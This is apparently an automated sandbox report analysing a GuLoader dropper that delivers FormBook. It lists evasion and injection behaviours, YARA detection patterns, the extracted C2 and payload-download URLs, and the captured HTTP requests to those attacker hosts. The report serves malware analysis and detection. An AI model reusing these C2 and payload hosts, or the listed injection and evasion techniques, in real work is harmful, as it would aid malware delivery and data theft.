Play interactive tour

Edit tour

Windows Analysis Report RYATPPETU.exe

Overview

General Information

Sample Name:	RYATPPETU.exe
Analysis ID:	510462
MD5:	7a4b8b634d2e94cd1e458af5918be3aa
SHA1:	b6989ba569206ab6527aff0f8bd3278371ef7953
SHA256:	056477676a6b327511c22c10e77e4e5f3653b40528109d7715a9e9efffb4d068
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

Self deletion via cmd delete

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

RYATPPETU.exe (PID: 1860 cmdline: 'C:\Users\user\Desktop\RYATPPETU.exe' MD5: 7A4B8B634D2E94CD1E458AF5918BE3AA)

RYATPPETU.exe (PID: 2248 cmdline: 'C:\Users\user\Desktop\RYATPPETU.exe' MD5: 7A4B8B634D2E94CD1E458AF5918BE3AA)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmmon32.exe (PID: 5516 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)

cmd.exe (PID: 5608 cmdline: /c del 'C:\Users\user\Desktop\RYATPPETU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lrbounee.xyz/kb8y/"], "decoy": ["kurdestates.com", "jojoinu.site", "humanblossoms.com", "pnmingyue.com", "breathewellductcleaning.com", "2631blg.xyz", "growwithgardiner.net", "dirtyfrenchdubai.com", "atlynnmusic.online", "vongquayfreefire247.com", "tafzba064.xyz", "realdealtrujillo.com", "liveartexperiences.com", "saimashafique.com", "istanbulmasajreklam.xyz", "fhwy6.com", "tecladistaemfoco.com", "libertyshelly.com", "raduanis.com", "hairshop-wave.com", "waytubeissue.top", "taurustwinscreation.com", "pashtointl.com", "yourfacedesigns.com", "elitbahistv9.com", "cerveceriachapultepectx.com", "vitalingredientsforliving.com", "wezdum.xyz", "matyherbs.com", "beffr.xyz", "mobilenftexchange.com", "tucsonpoolsservices.com", "sn-699.com", "quintasenalquiler.com", "radyometre.com", "victoryinthemaking.com", "stocolour.com", "social-data-company.com", "supportudc.xyz", "larrythecat.net", "candlessenceuk.com", "luciusbullens.com", "indianaexoticshop.com", "punkjoin.com", "effectivetherapeutics.com", "xybernft.com", "enaturism.xyz", "battlegroundbuzz.com", "bookseparat.com", "pepsicoinvest.xyz", "techexpertacademy.com", "yapbicicek.xyz", "kawaii-to-the-core.com", "afterthesethings.com", "inboxboree.com", "brooklyngats.com", "kc1628.com", "gfooveed.xyz", "sarabicompany.com", "emtreeconsulting.com", "chandcollege.com", "revolutiongaming.xyz", "babyunspillabowls.com", "etr6safvu8.com"]}

Threatname: GuLoader

{"Payload URL": "https://blumeconstructionllc.com/bin_NX"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x442c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5839:$sqlite3step: 68 34 1C 7B E1 0x594c:$sqlite3step: 68 34 1C 7B E1 0x5868:$sqlite3text: 68 38 2A 90 C5 0x598d:$sqlite3text: 68 38 2A 90 C5 0x587b:$sqlite3blob: 68 53 D8 7F 8C 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x3f04:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5839:$sqlite3step: 68 34 1C 7B E1 0x594c:$sqlite3step: 68 34 1C 7B E1 0x5868:$sqlite3text: 68 38 2A 90 C5 0x598d:$sqlite3text: 68 38 2A 90 C5 0x587b:$sqlite3blob: 68 53 D8 7F 8C 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: RYATPPETU.exe PID: 2248	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: cmmon32.exe PID: 5516	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 22 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.lrbounee.xyz/kb8y/"], "decoy": ["kurdestates.com", "jojoinu.site", "humanblossoms.com", "pnmingyue.com", "breathewellductcleaning.com", "2631blg.xyz", "growwithgardiner.net", "dirtyfrenchdubai.com", "atlynnmusic.online", "vongquayfreefire247.com", "tafzba064.xyz", "realdealtrujillo.com", "liveartexperiences.com", "saimashafique.com", "istanbulmasajreklam.xyz", "fhwy6.com", "tecladistaemfoco.com", "libertyshelly.com", "raduanis.com", "hairshop-wave.com", "waytubeissue.top", "taurustwinscreation.com", "pashtointl.com", "yourfacedesigns.com", "elitbahistv9.com", "cerveceriachapultepectx.com", "vitalingredientsforliving.com", "wezdum.xyz", "matyherbs.com", "beffr.xyz", "mobilenftexchange.com", "tucsonpoolsservices.com", "sn-699.com", "quintasenalquiler.com", "radyometre.com", "victoryinthemaking.com", "stocolour.com", "social-data-company.com", "supportudc.xyz", "larrythecat.net", "candlessenceuk.com", "luciusbullens.com", "indianaexoticshop.com", "punkjoin.com", "effectivetherapeutics.com", "xybernft.com", "enaturism.xyz", "battlegroundbuzz.com", "bookseparat.com", "pepsicoinvest.xyz", "techexpertacademy.com", "yapbicicek.xyz", "kawaii-to-the-core.com", "afterthesethings.com", "inboxboree.com", "brooklyngats.com", "kc1628.com", "gfooveed.xyz", "sarabicompany.com", "emtreeconsulting.com", "chandcollege.com", "revolutiongaming.xyz", "babyunspillabowls.com", "etr6safvu8.com"]}
Source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://blumeconstructionllc.com/bin_NX"}

Multi AV Scanner detection for submitted file

Show sources

Source: RYATPPETU.exe	Virustotal: Detection: 31%			Perma Link
Source: RYATPPETU.exe	ReversingLabs: Detection: 27%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: RYATPPETU.exe

Joe Sandbox ML: detected

Source: 15.2.cmmon32.exe.549f840.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.2.cmmon32.exe.3254318.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.RYATPPETU.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.2.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.3.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.1.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.RYATPPETU.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen

Source: RYATPPETU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 45.82.177.176:443 -> 192.168.2.5:49697 version: TLS 1.2

Source:	Binary string: cmmon32.pdb source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp, cmmon32.exe, 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RYATPPETU.exe, cmmon32.exe

Source: C:\Windows\SysWOW64\cmmon32.exe

Code function: 4x nop then pop ebx

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.etr6safvu8.com
Source: C:\Windows\explorer.exe	Domain query: www.lrbounee.xyz
Source: C:\Windows\explorer.exe	Network Connect: 172.67.161.80 80

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.lrbounee.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: www.lrbounee.xyz/kb8y/
Source: Malware configuration extractor	URLs: https://blumeconstructionllc.com/bin_NX

Source: Joe Sandbox View	ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1Host: www.lrbounee.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: GET /bin_NXOEaeagUq10.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: blumeconstructionllc.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 18:18:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qqJ2Q9iCH1RRBQKJHt7%2Bpll1gj8DBHVrUY1%2ByxZfQWtFIoZbTjROcASUpSCa3xt1a89lPkmS%2FOwrIt5r%2Btdm6auT0AZrk%2Fg7h%2BdIwpX%2BPk3RXDFVKvodDvIcTZiBaHT4Vg1K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a4dede68e4e4ee6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 39 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 9f<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.15.8.3</center></body></html>

Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://soleprotect.de/bin_NXOEaeagUq10.bin

Source: unknown

DNS traffic detected: queries for: blumeconstructionllc.com

Source: global traffic	HTTP traffic detected: GET /bin_NXOEaeagUq10.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: blumeconstructionllc.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1Host: www.lrbounee.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

HTTPS traffic detected: 45.82.177.176:443 -> 192.168.2.5:49697 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: RYATPPETU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
